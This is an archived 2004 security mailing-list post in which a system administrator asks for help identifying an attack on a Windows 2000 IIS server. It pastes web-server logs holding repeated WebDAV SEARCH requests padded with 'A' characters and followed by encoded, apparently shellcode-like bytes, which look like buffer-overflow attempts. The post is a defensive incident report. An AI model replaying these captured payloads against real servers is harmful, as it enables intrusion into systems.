lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200404290634.AA205390158@transientimages.com>
From: root at transientimages.com (System Administrator)
Subject: Exploit Identification Request

Folks : 

One of our external systems (W2k, fully patched all components - 
sp4, sql sp4, mdac sp3, post hotfixes, etc) is being hit by what 
appears to be a buffer overflow of IIS : 4096 bytes cycling in 
what appears to be an attempt to execute code. The probe starts by 
obtaining an index.asp page, and then drops a "SEARCH / 411 210 
42" before dropping the "AAAAA<n>" string. 

I've checked the SEARCH unicode against google (nothing) and k-
otic's current exploits (nada) and dsheild tables (nada).

Can anyone assist in idenfification of the exploit\overrun attempt?

Thanks,
Oliver

2004-04-28 21:12:38 x.x.88.247 GET /index.asp 200 0 189 
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:12:38 x.x.88.247 SEARCH / 411 210 42 - -
2004-04-28 21:12:45 x.x.88.247 
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrfd
2004-04-28 21:12:51 217.185.88.247 
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
2004-04-28 21:13:01 217.185.198.113 GET /index.asp 200 0 189 
Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98) -
2004-04-28 21:13:04 217.185.198.113 SEARCH / 411 210 42 - -
2004-04-28 21:13:27 217.185.198.113 
SEARCH /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA???.??????????????????????????????????####??????????
rmomddddddisjhnegdddddddlohddplokdepnqlojldlloskjndiimrlimddddddrfs
mlgrpehggpdidjlfrjikljijljljskgkhjlipkgkjjgloqpidjndjjndfididjldddd
ddhdigssejlgslsskhfmlosljnddlopjlgpdelidloilspiglgpddhidikssijdhidi
kssijdlillipdkhdmloqpggpdidigssijdpssijedieijlohigploihflkldgqiiflo
kffddgsiggpmhmhenqdgpiggqodsoredgnqjkhdlpepodqdgqnhdrosegoeskirkinl
oinfhdgqqjjlodpholoinepdgqqlodhlodgpinoirimpgrlhfssssssniekddkpeskm
dnrlsomksqdsmlsrlndrrsprrdjdddgfddddddddddddhqinmddddgdddddddhddddd
dssssddddolddddddddddddddhddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddddddddrldddddddresondrddohdmpqfeoldehppqfei
hjljmkgfdkdkfjsjkkfjejqfdjgjejrjrjskhfdjfjifdkfkijrfdjmjrf
 


 
                   


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ